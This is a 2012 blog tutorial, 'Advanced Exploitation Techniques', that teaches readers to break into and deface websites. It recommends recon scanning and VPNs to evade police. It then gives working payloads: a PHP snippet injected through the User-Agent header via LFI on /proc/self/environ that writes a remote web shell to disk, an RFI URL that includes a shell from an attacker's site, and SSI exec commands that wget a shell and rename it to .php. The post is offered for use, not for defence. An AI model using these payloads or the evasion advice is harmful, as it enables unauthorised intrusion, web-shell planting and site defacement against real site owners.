Search This Blog

Wednesday, November 7, 2012

Advanced Exploitation Techniques


Table of Contents
Chapter I: Recon
Chapter II: Getting the tools ready
Chapter III: Getting your ass safe
Chapter IV: Local File Inclusion
Chapter V: Remote File Inclusion
Chapter VI: Server Side Inclusion
Chapter VII: Last word


Chapter I: Recon

Allright imagine this: "You are a NAVY seal, ready to strike Osama binladens House. But.... you havent prepared any strategy, plan, you havent found any flaw in the house its security. I bet you could tell me whats going to happen with the mission. COMPLETE FAILURE.
Always plan, plan and dont forget... Plan. Let me explain you briefly what i mean with planning. The art of planning is basicly gathering information about your target. The information i always collect is: The OS, The CMS it is running, Are there any open ports?. Then after i have gathered that information i usually perform a paros Proxy scan on the site. Basicly all it does is, scan the site for vulnerabilities and make up an fancy report.
If you want to download and use Paros for yourself be my guest.
Allright now.. I assume that you have the following information:
Any idea which ports are open on the target, The Operating System, The possible CMS the server is running (not necessary) and Your Paros Proxy report. Thats basicly all the information you need to determine which kind of attack you are going to use against the target.

Chapter II: Tools

Like every job there is, you will need tools.
We hackers have a very small ammount of tools necessarry to complete our main goal. Which is exploiting that one website you wish to deface.
Allright troughout this tutorial we are not going to use fancy tools etc.
Instead we will be using these key tools: -Your brain, -Your hands and last but certainly not least.... Firefox.
Make sure that you have either http headers or tamperdata installed as a firefox plugin.


Chapter III: Safey

In a world, where people hack targets you have another group of people. I bet you feel this comming.... The police.
Trust me on this one, once you start hacking big sites. The police will try to get your ass. But not when we are around. We can outsmart the police by using a VPN. VPN stands for Virtual Private Network. Basicly its a server you can connect to, which will intercept all your packets and make them go trough their server. All that it does is hide your real IP.
Some free VPN's are: Cyberghost, VPNreactor and nProx.
Once you move on to the bigger sites, i would highly recommend to get a paid VPN like vpntunnel or anonine.


Chapter IV: Local File Inclusion

Most of you have probally heard about this method once or twice. This is the so called "LFI" exploitation method.
LFI can occur on sites with this extension:

Code:
http://site.com/index.php?page=
When you perform an LFI attack you attempt to bypass the server directories to end up into the proc/self/environ directory. This can be done with ../../../proc/self/environ or if the ../. Useless you say? WELL i couldnt disagree more with you on that one. You see on the first sight proc/self/environ seems like a bunch of shit.
It will look something like this:


Code:
TMPDIR=/var/chroot/home/content/23/8340423/tmpPHPRC=/var/chroot/home/content/23/8340423/htmlTEMP=/var/chroot/home/content/23/8340423/tmpPHP_FCGI_CHILDREN=0PATH=/usr/local/bin:/usr/bin:/binPWD=/web/cgi-binSHLVL=0RAILS_ENV=productionSPI=TRUETMP=/var/chroot/home/content/23/8340423/tmpPHP_FCGI_MAX_REQUESTS=100000
But there is something really cool we can do with this.
We can spawn a shell trough this directory...
Now i got your attention right? Good. To spawn a shell we simply open up our tamper data en reload the page while we are tampering.
Once you see a little message pop up, click tamper data.
Now we will notice a little Useragent tab.
In there we will type the following code:

PHP Code:
<?php $file = fopen("shellname.php","w+"); $stream = fopen ("Link you shell here/shell.txt", "r"); while(!feof($stream)) {
$shell .=fgets($stream); } fwrite($file, $shell); fclose($file);?>
Thanks to Legit for that code. Works beter then mine with system();
Now once you have done that, click the submit button and your shell should be spawned Smile. To check if it worked go to http://site.com/shell.php and voila.


Chapter V: Remote File Inclusion

Im not very glad to say, but this is one of the good exploit methods that has died. There are almost no websites who have this vulnerability. Thats because its so easy to fix and yet so harmfull.
I will explain you the so called "RFI" briefly.
RFI or remote file inclusion is an technique where you exploit the include(); function.
RFI and LFI are quite similair, there's a catch tho. "Remote" refers to using an external site to upload your shell and "Local" refers to uploading your shell using the same site.
For an example: a site includes php scripts in an un-protected manner.
A little bit like this:
PHP Code:
<?php
$color = 'blue';
if (isset( $_GET['COLOR'] ) )
$color = $_GET['COLOR'];
include( $color . '.php' );
?>

Now to exploit this we will execute the following command:

Code:
http://site.com/index.php?page=http://yourevilsite.com/shell.txt

Now you are wondering.. why the hell did he use a .txt shell?
PHP automaticly transfers .txt > .php. which will result in a nice shell to own/deface the website.

Chapter VI: Server Side Inclusion

Okay now we move on to the "harder" methods.
Server Side Inclusion or SSI is an advanced technique that exploits vulnerabilities in the HTML code.
All that this means is that you inject script into html-forms and that it will result in spawning a shell or doing something worse.
SSI can only be performed in a few pages. Only pages with .shtml and .shtm are affected by this. These pages are 100% injectable. There is a something else to keep in mind. SSI will also work in normal pages, but ONLY when the input is not filtered.
For an example we have a little textbox which is vulnerable to SSI.
We can do some nice little commands here for an example:

Code:
< !--#exec cmd="cd \admin\dir">
< !--#exec cmd="wget http://www.yoursite.com/youknowwutthisis.txt" -->
i will explain these 2 commands to you for a moment.
The first command lets you browse directories that you cant acces without administrator priveleges. The second command lets you download your shell on the website (This is the shit we are interested in).
Then the only thing left for you to do is to locate your file by executing this command:

Code:
< !--#exec cmd="cp folderlocation/shellname.txt folderlocation/yourshellname.php" -->
This basicly finds your shell.txt, converts it to PHP and places it in the directory of your choice.

Chapter VII: Last things

Well this was my little tutorial regarding uncommon forms of attack.
I hope you have learned something from it and i hope to hear your personal experiences with this.
If this helped you, please leave any form of thank you. Its highly apreciated

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

0 comments:

Post a Comment